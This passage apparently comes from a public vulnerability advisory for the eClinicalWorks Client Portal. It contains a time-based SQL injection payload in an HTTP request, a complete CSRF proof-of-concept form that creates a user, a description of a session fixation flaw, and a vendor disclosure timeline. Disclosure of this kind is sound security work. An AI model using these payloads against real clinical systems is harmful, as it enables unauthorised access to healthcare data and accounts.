WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nX-Requested-With: XMLHttpRequest \nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp \nContent-Length: 186 \n[SNIP] ... \nConnection: keep-alive \nPragma: no-cache \nCache-Control: no-cache \n[SNIP] ... \n \naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate= \n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno= \n \n------------------------------------- \n \n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY \nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \nClient Portal allows remote attackers to hijack the authentication of content administrators \nfor requests that could lead to the creation, modification and deletion of users, appointments \nand employees. \n \n# ADDING OF USER \n<html> \n<body> \n<form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\"> \n<input type=\"hidden\" name=\"action\" value=\"add\" /> \n<input type=\"hidden\" name=\"uid\" value=\"0\" /> \n<input type=\"hidden\" name=\"createdOver\" value=\"1\" /> \n<input type=\"hidden\" name=\"ufname\" value=\"John\" /> \n<input type=\"hidden\" name=\"ulname\" value=\"Doe\" /> \n<input type=\"hidden\" name=\"uminitial\" value=\"\" /> \n<input type=\"hidden\" name=\"selUserType\" value=\"1\" /> \n<input type=\"hidden\" name=\"status\" value=\"0\" /> \n<input type=\"hidden\" name=\"upaddress\" value=\"\" /> \n<input type=\"hidden\" name=\"upcity\" value=\"\" /> \n<input type=\"hidden\" name=\"upstate\" value=\"\" /> \n<input type=\"hidden\" name=\"zipcode\" value=\"\" /> \n<input type=\"hidden\" name=\"uemail\" value=\"johndoe@test.com.de\" /> \n<input type=\"hidden\" name=\"upphone\" value=\"98999299\" /> \n<input type=\"hidden\" name=\"umobileno\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \n------------------------------------- \n \n# CVE-2015-4594 SESSION FIXATION \nThe web application is vulnerable to session fixation attacks. When authenticating a user \nthe application does not assign a new session ID, making it possible to use an existent \nsession ID. \n \n------------------------------------- \n \n# TIMELINE \n\u0096 16/06/2015: Vulnerability found \n\u0096 16/06/2015: Vendor informed \n\u0096 16/06/2015: Request for CVE IDs \n- 16/06/2015: MITRE issued CVE numbers \n\u0096 16/06/2015: Vendor responded requesting more information on support contract etc \n- 21/06/2015: No support contract, vendor does not open case \n- 22/06/2015: Requested update from vendor, no response \n- 01/07/2015: Contacted vendor again, vendor requested for support contract again \n- 02/07/2015: No support contract, no response from vendor \n\u0096 31/01/2016: Public disclosure \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/135533/eclinicalworks-sqlxssxsrfsf.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}